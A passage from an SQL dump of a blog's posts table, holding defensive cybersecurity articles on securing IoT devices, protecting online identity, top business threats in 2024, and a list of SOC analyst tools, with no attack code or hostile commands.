devices, causing them to fail.</li>\r\n</ul>\r\nA well-known incident involved a smart camera hack that allowed unauthorized access to homeowners\' live feeds, highlighting the real risks of poor security.\r\n<h3 id=\"weak-passwords-and-default-credentials\">Weak Passwords and Default Credentials</h3>\r\nMany users fail to change default passwords on their IoT devices. This is a significant risk. According to research, nearly 80% of data breaches involve weak or stolen passwords. Always create strong, unique passwords for each device.\r\n<h3 id=\"lack-of-software-updates\">Lack of Software Updates</h3>\r\nRegular software updates are vital for maintaining security. They fix weaknesses that hackers could exploit. Experts suggest checking for updates at least once a week to ensure devices are protected against known vulnerabilities.\r\n<h2 id=\"securing-your-home-network\">Securing Your Home Network</h2>\r\n<h3 id=\"strong-router-password\">Strong Router Password</h3>\r\nYour router is the gateway to your home network. Create a strong password, ideally using a mix of letters, numbers, and symbols. Avoid predictable words or phrases. Passwords should be at least 12 characters long.\r\n<h3 id=\"firewall-protection\">Firewall Protection</h3>\r\nFirewalls act as a barrier between your network and potential threats. Most routers come with built-in firewalls. Check the settings to ensure they are activated. Configure your firewall to block unwanted traffic and set alerts for suspicious activities.\r\n<h3 id=\"network-segmentation\">Network Segmentation</h3>\r\nSeparate your IoT devices from your main network. This way, if one device gets hacked, attackers can be limited in what they can access. Tutorials online can guide you through setting this up with your router.\r\n<h2 id=\"choosing-secure-iot-devices\">Choosing Secure IoT Devices</h2>\r\n<h3 id=\"research-device-security-features\">Research Device Security Features</h3>\r\nBefore buying any IoT device, look into its security features. Features like end-to-end encryption and automatic updates can significantly enhance security.\r\n<h3 id=\"reputable-brands\">Reputable Brands</h3>\r\nPurchase devices from well-known brands. These companies are more likely to produce items that receive regular security updates and patches, ensuring your devices remain safe.\r\n<h3 id=\"read-reviews\">Read Reviews</h3>\r\nExplore online reviews focusing on the security aspects of a device. Users often share their experiences with vulnerabilities and how the manufacturer responded.\r\n<h2 id=\"implementing-strong-security-practices\">Implementing Strong Security Practices</h2>\r\n<h3 id=\"enable-two-factor-authentication-2fa\">Enable Two-Factor Authentication (2FA)</h3>\r\nTwo-factor authentication adds an extra layer of protection. This means you need both a password and a second step, like a text message code. Many IoT devices allow you to set this up in their settings.\r\n<h3 id=\"regular-software-updates\">Regular Software Updates</h3>\r\nMake it a habit to check for firmware updates regularly. Some devices offer automatic updates, which can take the hassle out of securing your devices. Enable this setting wherever possible.\r\n<h3 id=\"disable-unnecessary-features\">Disable Unnecessary Features</h3>\r\nMany IoT devices come with features you may not need. Disable options like remote access or voice activation if they aren\'t necessary. Fewer active features mean fewer avenues for attacks.\r\n<h2 id=\"monitoring-your-iot-devices\">Monitoring Your IoT Devices</h2>\r\n<h3 id=\"network-monitoring-tools\">Network Monitoring Tools</h3>\r\nUtilize network monitoring tools, such as Fing or Network Monitor, to keep an eye on your home network. These tools can identify unusual device activity, flagging potential breaches quickly.\r\n<h3 id=\"security-alerts\">Security Alerts</h3>\r\nSet up alerts for your devices. Many smart devices can inform you of unusual access attempts or suspicious behavior, allowing you to respond swiftly if something seems off.\r\n<h3 id=\"regular-security-audits\">Regular Security Audits</h3>\r\nSchedule regular checks of your IoT devices and home network. Look for changes in device behavior and ensure all security settings remain in place.\r\n\r\nIn summary, securing your IoT devices is essential to keeping your personal information safe. Weak passwords, lack of updates, and unsecured networks can lead to severe consequences. By employing proactive measures—such as strong passwords, research, and regular monitoring—you can better protect your devices. Don’t wait for a security breach to take action. Start implementing these practices today to ensure your IoT environment is as safe as possible.', '', NULL, NULL, 1, 'draft', '2024-12-11 16:55:18', '2026-01-12 21:41:44', 'Information Security', 'How to Secure Your Internet of Things (IoT) Devices', '', NULL),
(86, 'How to Protect Your Online Identity', 'how-to-protect-your-online-identity', 'The internet is an essential part of our lives, but it comes with risks. Identity theft and online fraud are on the rise, making it crucial to protect your online identity. With data collection everywhere and increasingly sophisticated scams, taking charge of your digital self has never been more critical.\r\n<h3 id=\"the-pervasiveness-of-data-collection-in-the-digital-age\">The pervasiveness of data collection in the digital age</h3>\r\nEvery time you log in to a website, use an app, or post on social media, your data might be collected. Companies and hackers are eager to get this information for marketing or malicious purposes.\r\n<h3 id=\"statistics-on-identity-theft-and-online-fraud\">Statistics on identity theft and online fraud</h3>\r\nAccording to recent studies, millions of people fall victim to identity theft annually. The Federal Trade Commission (FTC) reported over $3 billion lost due to fraud in just one year.\r\n<h3 id=\"the-importance-of-proactive-identity-protection\">The importance of proactive identity protection</h3>\r\nWith these numbers, it\'s clear that taking steps to protect yourself is necessary. Identifying risks and acting early can save you from stress and financial loss.\r\n<h2 id=\"secure-your-passwords-and-accounts\">Secure Your Passwords and Accounts</h2>\r\n<h3 id=\"best-practices-for-creating-strong-unique-passwords\">Best practices for creating strong, unique passwords</h3>\r\nTo secure your accounts, start with strong, unique passwords. Avoid using easy-to-guess words like “123456” or “password.” Instead, consider these tips:\r\n<ul>\r\n 	<li>Combine letters, numbers, and symbols for complexity.</li>\r\n 	<li>Use a mix of upper and lower-case letters.</li>\r\n 	<li>Aim for at least 12 characters.</li>\r\n</ul>\r\n<h4 id=\"password-managers-and-their-benefits\">Password managers and their benefits</h4>\r\nPassword managers can help store and create complex passwords, so you don’t have to remember them all. They also can help you identify weak passwords.\r\n<h4 id=\"two-factor-authentication-2fa-and-multi-factor-authentication-mfa\">Two-factor authentication (2FA) and multi-factor authentication (MFA)</h4>\r\nEnable 2FA or MFA on your accounts whenever possible. This adds a layer of security, requiring you to verify your identity through a second step, like a text message or app.\r\n<h3 id=\"regularly-updating-passwords-and-enabling-account-recovery-options\">Regularly updating passwords and enabling account recovery options</h3>\r\nStay vigilant by updating passwords every few months. Set up recovery options, like security questions or backup email addresses, to regain access if needed.\r\n<ul>\r\n 	<li>Remember: examples like the Facebook and LinkedIn breaches show how vital it is to keep passwords secure.</li>\r\n</ul>\r\n<h3 id=\"the-importance-of-choosing-strong-unique-passwords-for-financial-accounts\">The importance of choosing strong, unique passwords for financial accounts</h3>\r\nYour financial information is prime target. Hence, use unique and strong passwords for banking and shopping sites to keep your money safe.\r\n<h2 id=\"protect-your-personal-information-online\">Protect Your Personal Information Online</h2>\r\n<h3 id=\"avoiding-phishing-scams-and-suspicious-emails\">Avoiding phishing scams and suspicious emails</h3>\r\nLearn to spot phishing attempts, which often come disguised as legitimate emails. Keep an eye out for:\r\n<ul>\r\n 	<li>Misspellings or poor grammar.</li>\r\n 	<li>Urgency or threats to take immediate action.</li>\r\n 	<li>Unknown senders or strange email addresses.</li>\r\n</ul>\r\n<h4 id=\"red-flags-of-phishing-emails-and-websites\">Red flags of phishing emails and websites</h4>\r\nAlways double-check URLs before clicking. Legitimate websites will use secure HTTPS connections.\r\n<h4 id=\"real-world-examples-of-successful-phishing-campaigns\">Real-world examples of successful phishing campaigns</h4>\r\nHigh-profile cases, like the Google and Facebook scam, show that even big companies can fall victim.\r\n<h3 id=\"safeguarding-your-social-media-presence\">Safeguarding your social media presence</h3>\r\nAdjust privacy settings on social media accounts. Only share what’s necessary and avoid revealing sensitive information like your location or full birth date.\r\n<h3 id=\"being-mindful-of-public-wi-fi-and-unsecured-networks\">Being mindful of public Wi-Fi and unsecured networks</h3>\r\nThink twice before using public Wi-Fi for sensitive activities. Instead, use a VPN or wait until you’re on a secure network.\r\n<h2 id=\"monitor-your-online-activity-and-credit-reports\">Monitor Your Online Activity and Credit Reports</h2>\r\n<h3 id=\"regularly-checking-your-credit-report-for-any-suspicious-activity\">Regularly checking your credit report for any suspicious activity</h3>\r\nKeep an eye on your credit report for unauthorized accounts. You’re entitled to one free report from each credit bureau annually.\r\n<h4 id=\"the-role-of-credit-monitoring-services\">The role of credit monitoring services</h4>\r\nConsider signing up for credit monitoring services to automatically track your credit and alert you to any changes.\r\n<h4 id=\"steps-to-take-if-you-discover-fraudulent-activity\">Steps to take if you discover fraudulent activity</h4>\r\nIf you spot suspicious activity, report it immediately to your bank and credit card companies. They can help you mitigate damage.\r\n<h3 id=\"utilizing-online-security-tools-and-monitoring-software\">Utilizing online security tools and monitoring software</h3>\r\nChoose reputable security software, like Norton or McAfee, to help ward off online threats. Regular scans can catch issues before they escalate.\r\n<h3 id=\"the-importance-of-proactive-monitoring\">The importance of proactive monitoring</h3>\r\nStay proactive with regular monitoring of your online accounts and activity. It can help you catch problems early.\r\n<h2 id=\"safe-browsing-habits-and-digital-literacy\">Safe Browsing Habits and Digital Literacy</h2>\r\n<h3 id=\"educating-yourself-on-common-online-threats-and-scams\">Educating yourself on common online threats and scams</h3>\r\nHone your skills by exploring resources on online safety. The FTC and cybersecurity websites offer great information.\r\n<h3 id=\"staying-up-to-date-on-the-latest-online-threats\">Staying up-to-date on the latest online threats</h3>\r\nStay informed about online scams to avoid falling victim. Subscribe to alerts or newsletters that help you stay aware of new threats.\r\n<h3 id=\"using-secure-websites-and-apps\">Using secure websites and apps</h3>\r\nAlways look for secure websites. An URL starting with \"HTTPS\" means it’s encrypted and safer. Only download apps from trusted sources like Google Play or Apple’s App Store.\r\n<h2 id=\"responding-to-identity-theft-or-online-fraud\">Responding to Identity Theft or Online Fraud</h2>\r\n<h3 id=\"steps-to-take-if-you-suspect-your-identity-has-been-compromised\">Steps to take if you suspect your identity has been compromised</h3>\r\nIf you suspect your identity\'s been stolen, act fast. Report it to the FTC and your bank to limit losses.\r\n<h4 id=\"reporting-identity-theft-to-the-appropriate-authorities\">Reporting identity theft to the appropriate authorities</h4>\r\nFile a report with your local police and the FTC. They can help you navigate recovery.\r\n<h3 id=\"utilizing-resources-for-victims-of-online-fraud\">Utilizing resources for victims of online fraud</h3>\r\nVarious agencies offer support for victims. Check out the FTC’s IdentityTheft.gov for resources and recovery steps.\r\n<h3 id=\"the-importance-of-expert-advice-on-recovery\">The importance of expert advice on recovery</h3>\r\nDon’t hesitate to reach out to professionals for advice. They can provide tailored assistance to help you recover from identity theft.\r\n<h2 id=\"conclusion-taking-control-of-your-digital-security\">Conclusion: Taking Control of Your Digital Security</h2>\r\n<h3 id=\"key-takeaways-and-actionable-steps-for-improved-online-safety\">Key takeaways and actionable steps for improved online safety</h3>\r\nStart now by reviewing your online accounts, strengthening your passwords, and educating yourself about online threats.\r\n<h3 id=\"the-ongoing-need-for-vigilance-in-protecting-your-online-identity\">The ongoing need for vigilance in protecting your online identity</h3>\r\nRemember that protecting your identity is an ongoing task. Regularly monitoring and learning are essential.\r\n<h3 id=\"encouraging-proactive-behavior-and-continuous-learning\">Encouraging proactive behavior and continuous learning</h3>\r\nBy making online safety a priority, you can enjoy the internet knowing you’re safeguarded against potential risks. Your digital identity is worth the effort.', '', NULL, NULL, 1, 'draft', '2024-12-11 14:57:51', '2026-01-12 21:41:44', 'Information Security', 'How to Protect Your Online Identity', '', NULL),
(87, 'Top 10 Cybersecurity Threats Facing Businesses in 2024', 'top-10-cybersecurity-threats-facing-businesses-in-2024', 'Cybersecurity remains a critical concern for businesses in 2024. The global cost of cyberattacks is projected to reach $10.5 trillion annually, creating a pressing need for organizations to strengthen their security measures. With the ever-evolving threat landscape, cybercriminals continually adapt their tactics, making it essential for companies to stay ahead of these challenges. This article outlines the top 10 cybersecurity threats of 2024 and provides actionable mitigation strategies.\r\n<h2 id=\"ransomware-attacks\">Ransomware Attacks</h2>\r\n<h3 id=\"the-rise-of-ransomware-as-a-service-raas\">The Rise of Ransomware-as-a-Service (RaaS)</h3>\r\nRansomware-as-a-Service has transformed the way ransomware attacks are conducted. The number of RaaS incidents has spiked by 50% compared to last year, making it easier for attackers to target businesses. A notable example is the attack on a major healthcare provider last year, which resulted in the leakage of sensitive patient data.\r\n<h3 id=\"ransomware-mitigation-strategies\">Ransomware Mitigation Strategies</h3>\r\n<ul>\r\n 	<li><strong>Data Backups:</strong> Regularly back up data and store it offline.</li>\r\n 	<li><strong>Employee Training:</strong> Conduct training sessions to raise awareness about ransomware threats.</li>\r\n 	<li><strong>Multi-Factor Authentication:</strong> Implement MFA to add an extra layer of security. Experts agree this is crucial.</li>\r\n</ul>\r\n<h2 id=\"phishing-and-social-engineering\">Phishing and Social Engineering</h2>\r\n<h3 id=\"sophistication-of-phishing-techniques\">Sophistication of Phishing Techniques</h3>\r\nPhishing tactics have become more advanced, with spear phishing and clone phishing leading the pack. In 2023, phishing attacks saw a 70% success rate, affecting countless organizations.\r\n<h3 id=\"combating-phishing-attacks\">Combating Phishing Attacks</h3>\r\n<ul>\r\n 	<li><strong>Identification Training:</strong> Teach employees how to recognize phishing attempts.</li>\r\n 	<li><strong>Email Security Solutions:</strong> Invest in robust email filters and scanners.</li>\r\n 	<li><strong>Awareness Campaigns:</strong> Regularly update training on social engineering tactics.</li>\r\n</ul>\r\n<h2 id=\"supply-chain-attacks\">Supply Chain Attacks</h2>\r\n<h3 id=\"vulnerabilities-in-third-party-software\">Vulnerabilities in Third-Party Software</h3>\r\nData breaches linked to third-party vulnerabilities increased by 30% last year. A notable example is the SolarWinds attack, which compromised thousands of organizations.\r\n<h3 id=\"securing-your-supply-chain\">Securing Your Supply Chain</h3>\r\n<ul>\r\n 	<li><strong>Vetting Vendors:</strong> Assess the security practices of third-party vendors.</li>\r\n 	<li><strong>Access Controls:</strong> Use strong access management to limit data access.</li>\r\n 	<li><strong>Threat Intelligence:</strong> Stay informed about potential risks using intelligence tools.</li>\r\n</ul>\r\n<h2 id=\"cloud-security-threats\">Cloud Security Threats</h2>\r\n<h3 id=\"data-breaches-in-cloud-environments\">Data Breaches in Cloud Environments</h3>\r\nMisconfigurations in cloud settings have led to numerous data breaches, with a 45% increase in such incidents reported in 2023.\r\n<h3 id=\"best-practices-for-cloud-security\">Best Practices for Cloud Security</h3>\r\n<ul>\r\n 	<li><strong>Configuration Management:</strong> Keep cloud resources properly configured.</li>\r\n 	<li><strong>Data Encryption:</strong> Always encrypt sensitive data stored in the cloud.</li>\r\n 	<li><strong>Regular Audits:</strong> Conduct security audits and penetration tests to find weaknesses.</li>\r\n</ul>\r\n<h2 id=\"iot-security-risks\">IoT Security Risks</h2>\r\n<h3 id=\"vulnerabilities-in-iot-devices\">Vulnerabilities in IoT Devices</h3>\r\nIoT device attacks surged by 40%, causing concern across many sectors. There have been instances where smart devices were exploited to gain network access.\r\n<h3 id=\"securing-iot-devices\">Securing IoT Devices</h3>\r\n<ul>\r\n 	<li><strong>Strong Passwords:</strong> Always use complex passwords and change them regularly.</li>\r\n 	<li><strong>Network Segmentation:</strong> Isolate IoT devices from critical networks.</li>\r\n 	<li><strong>Access Controls:</strong> Enforce strict access controls on IoT devices.</li>\r\n</ul>\r\n<h2 id=\"insider-threats\">Insider Threats</h2>\r\n<h3 id=\"malicious-and-negligent-insiders\">Malicious and Negligent Insiders</h3>\r\nInsiders are responsible for 30% of data breaches. These breaches can be either malicious actions or simple negligence, highlighting the importance of managing insider threats.\r\n<h3 id=\"mitigating-insider-risks\">Mitigating Insider Risks</h3>\r\n<ul>\r\n 	<li><strong>Access Controls:</strong> Implement the principle of least privilege.</li>\r\n 	<li><strong>Monitoring:</strong> Regularly log and monitor employee activities.</li>\r\n 	<li><strong>Training:</strong> Consistently provide security awareness training to all employees.</li>\r\n</ul>\r\n<h2 id=\"ai-powered-attacks\">AI-Powered Attacks</h2>\r\n<h3 id=\"rise-of-ai-driven-malware\">Rise of AI-Driven Malware</h3>\r\nAI is increasingly used to craft sophisticated malware. Experiments have shown AI can produce malware that successfully bypasses many traditional defenses.\r\n<h3 id=\"defending-against-ai-powered-attacks\">Defending Against AI-Powered Attacks</h3>\r\n<ul>\r\n 	<li><strong>Advanced Detection Systems:</strong> Use AI tools to enhance threat detection.</li>\r\n 	<li><strong>Stay Updated:</strong> Always be aware of emerging threats.</li>\r\n 	<li><strong>Proactive Measures:</strong> Regularly assess and update security protocols.</li>\r\n</ul>\r\n<h2 id=\"ddos-attacks\">DDoS Attacks</h2>\r\n<h3 id=\"evolution-of-ddos-attacks\">Evolution of DDoS Attacks</h3>\r\nThe percentage of businesses experiencing Distributed Denial of Service (DDoS) attacks increased by 25%. Major attacks can disrupt services and harm company reputations.\r\n<h3 id=\"protecting-against-ddos-attacks\">Protecting Against DDoS Attacks</h3>\r\n<ul>\r\n 	<li><strong>Mitigation Solutions:</strong> Utilize DDoS protection services.</li>\r\n 	<li><strong>Regular Testing:</strong> Perform security audits and penetration tests regularly.</li>\r\n 	<li><strong>Incident Response Plan:</strong> Create and regularly update a DDoS response strategy.</li>\r\n</ul>\r\n<h2 id=\"mobile-device-security-threats\">Mobile Device Security Threats</h2>\r\n<h3 id=\"risks-associated-with-mobile-devices\">Risks Associated with Mobile Devices</h3>\r\nMobile malware incidents rose by 35%. Businesses often overlook the security of mobile devices, leading to potential breaches.\r\n<h3 id=\"securing-mobile-devices\">Securing Mobile Devices</h3>\r\n<ul>\r\n 	<li><strong>Security Policies:</strong> Create and enforce mobile device security policies.</li>\r\n 	<li><strong>Mobile Device Management:</strong> Implement MDM solutions to monitor and protect devices.</li>\r\n 	<li><strong>Awareness Training:</strong> Ensure employees are educated on mobile security threats.</li>\r\n</ul>\r\n<h2 id=\"cryptojacking\">Cryptojacking</h2>\r\n<h3 id=\"the-growing-threat-of-cryptojacking\">The Growing Threat of Cryptojacking</h3>\r\nCryptojacking attacks have increased by 50%, with attackers secretly using businesses’ computing power for cryptocurrency mining.\r\n<h3 id=\"mitigating-cryptojacking-risks\">Mitigating Cryptojacking Risks</h3>\r\n<ul>\r\n 	<li><strong>Regular Scans:</strong> Frequently scan for malicious software.</li>\r\n 	<li><strong>Endpoint Detection Solutions:</strong> Use EDR solutions for additional protection.</li>\r\n 	<li><strong>Stay Informed:</strong> Keep updated on new cryptojacking techniques.</li>\r\n</ul>\r\nCybersecurity continues to be a top priority as businesses face increasing threats. From ransomware to cryptojacking, understanding the landscape is essential for proactive defense. Companies must adopt effective mitigation strategies to secure their assets. Act now to strengthen your cybersecurity posture and stay informed about these evolving threats.', '', NULL, NULL, 1, 'draft', '2024-12-11 13:15:17', '2026-01-12 21:41:44', 'Information Security', 'Top 10 Cybersecurity Threats Facing Businesses in 2024', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(88, 'The Essential Security Analyst Toolkit: Comprehensive Guide for SOC Professionals', 'the-essential-security-analyst-toolkit', 'Security Operations Center (SOC) analysts play a crucial role in protecting organizations from an ever-growing array of threats. To effectively monitor, detect, analyze, and respond to these challenges, SOC analysts rely on a diverse set of powerful tools. This comprehensive guide explores the essential tools every security analyst should be familiar with, providing insights into their functions and recommending some of the most popular solutions in each category.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">SIEM: The Central Hub of Security Operations</h3>\r\nSecurity Information and Event Management (SIEM) systems serve as the cornerstone of any robust SOC. These platforms collect, normalize, and analyze security data from various sources across the network, providing real-time insights into potential threats and policy violations.Key functions of SIEM tools include:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Centralized log management</li>\r\n 	<li>Real-time monitoring and alerting</li>\r\n 	<li>Incident response coordination</li>\r\n 	<li>Compliance reporting</li>\r\n</ul>\r\nPopular SIEM solutions:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.splunk.com/\" target=\"_blank\" rel=\"nofollow noopener\">Splunk</a>: A powerful platform for searching, monitoring, and analyzing machine-generated big data.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://securityonionsolutions.com/\" target=\"_blank\" rel=\"nofollow noopener\">Security Onion</a>: A free and open-source platform for threat hunting, network security monitoring, and log management.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://logrhythm.com/\" target=\"_blank\" rel=\"nofollow noopener\">LogRhythm</a>: An enterprise-class platform that combines SIEM, log management, and machine analytics.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.ibm.com/products/qradar-siem\" target=\"_blank\" rel=\"nofollow noopener\">IBM QRadar</a>: A comprehensive SIEM solution for threat detection and compliance.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.microfocus.com/en-us/products/siem-security-information-event-management/overview\" target=\"_blank\" rel=\"nofollow noopener\">ArcSight</a>: A SIEM platform by Micro Focus for security monitoring and log management.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">IDS/IPS: Real-time Threat Detection and Prevention</h3>\r\nIntrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) are critical components of a layered security approach. While IDS focuses on monitoring and alerting, IPS takes it a step further by actively blocking or preventing detected threats.Popular IDS/IPS tools:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.snort.org/\" target=\"_blank\" rel=\"nofollow noopener\">Snort</a>: Open-source network IDS/IPS for real-time traffic analysis.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://suricata.io/\" target=\"_blank\" rel=\"nofollow noopener\">Suricata</a>: High-performance IDS, IPS, and network security monitoring engine.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.ossec.net/\" target=\"_blank\" rel=\"nofollow noopener\">OSSEC</a>: An open-source host-based IDS for log analysis and file integrity checking.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\" target=\"_blank\" rel=\"nofollow noopener\">Cisco Firepower</a>: A comprehensive IPS solution providing advanced threat protection.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.paloaltonetworks.com/network-security/next-generation-firewall\" target=\"_blank\" rel=\"nofollow noopener\">Palo Alto Networks</a>: Offers next-generation firewall capabilities with integrated IPS functionality.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">EDR: Securing the Endpoint Frontier</h3>\r\nEndpoint Detection and Response (EDR) solutions focus on detecting, investigating, and responding to suspicious activities on endpoints such as computers, servers, and mobile devices.Key features of EDR tools:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Advanced threat detection</li>\r\n 	<li>Incident response capabilities</li>\r\n 	<li>Continuous endpoint monitoring</li>\r\n</ul>\r\nPopular EDR solutions:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.crowdstrike.com/\" target=\"_blank\" rel=\"nofollow noopener\">CrowdStrike Falcon</a>: Offers advanced threat intelligence and endpoint protection.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.sentinelone.com/\" target=\"_blank\" rel=\"nofollow noopener\">SentinelOne</a>: Provides autonomous endpoint protection through AI-powered detection and response.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.carbonblack.com/\" target=\"_blank\" rel=\"nofollow noopener\">Carbon Black</a>: Delivers advanced threat detection and response capabilities.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender\" target=\"_blank\" rel=\"nofollow noopener\">Microsoft Defender for Endpoint</a>: Integrated endpoint security platform.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">SOAR: Streamlining Security Operations</h3>\r\nSecurity Orchestration, Automation, and Response (SOAR) solutions enhance the efficiency of security operations by automating incident response and orchestrating various security tools.Key benefits of SOAR platforms:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Automation of repetitive tasks</li>\r\n 	<li>Streamlined incident response</li>\r\n 	<li>Improved tool integration and coordination</li>\r\n</ul>\r\nPopular SOAR tools:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.paloaltonetworks.com/cortex/xsoar\" target=\"_blank\" rel=\"nofollow noopener\">Palo Alto Networks Cortex XSOAR</a>: Automates security operations and incident response.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.splunk.com/en_us/software/splunk-security-orchestration-and-automation.html\" target=\"_blank\" rel=\"nofollow noopener\">Splunk Phantom</a>: Enables automation of security workflows.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://swimlane.com/\" target=\"_blank\" rel=\"nofollow noopener\">Swimlane</a>: Provides orchestration and automation for SOC processes.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">TIP: Leveraging Threat Intelligence</h3>\r\nThreat Intelligence Platforms (TIP) aggregate, analyze, and share threat intelligence data from various sources to improve threat detection and response capabilities.Popular TIP solutions:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://talosintelligence.com/\" target=\"_blank\" rel=\"nofollow noopener\">Cisco Talos</a>: The world\'s most comprehensive real-time threat detection network.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://threatconnect.com/\" target=\"_blank\" rel=\"nofollow noopener\">ThreatConnect</a>: Aggregates, analyzes, and acts on threat intelligence.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.recordedfuture.com/\" target=\"_blank\" rel=\"nofollow noopener\">Recorded Future</a>: Provides real-time threat intelligence.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.misp-project.org/\" target=\"_blank\" rel=\"nofollow noopener\">MISP</a>: Facilitates sharing of threat intelligence.</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">OSINT: Harnessing Open-Source Intelligence</h3>\r\nOpen-Source Intelligence (OSINT) tools help analysts collect and analyze publicly available information to generate actionable intelligence.Key applications of OSINT:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Threat identification</li>\r\n 	<li>Contextual analysis</li>\r\n 	<li>Proactive defense</li>\r\n</ul>\r\nPopular OSINT tools:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://osintframework.com/\" target=\"_blank\" rel=\"nofollow noopener\">OSINT Framework</a>: A comprehensive collection of OSINT tools and resources.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://urlscan.io/\" target=\"_blank\" rel=\"nofollow noopener\">URLSCAN.io</a>: An online service for analyzing and inspecting website contents.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.maltego.com/\" target=\"_blank\" rel=\"nofollow noopener\">Maltego</a>: A data visualization tool used for OSINT and link analysis.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://github.com/lanmaster53/recon-ng\" target=\"_blank\" rel=\"nofollow noopener\">Recon-ng</a>: A web reconnaissance framework with numerous modules for OSINT tasks.</li>\r\n 	<li><a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://github.com/laramies/theHarvester\" 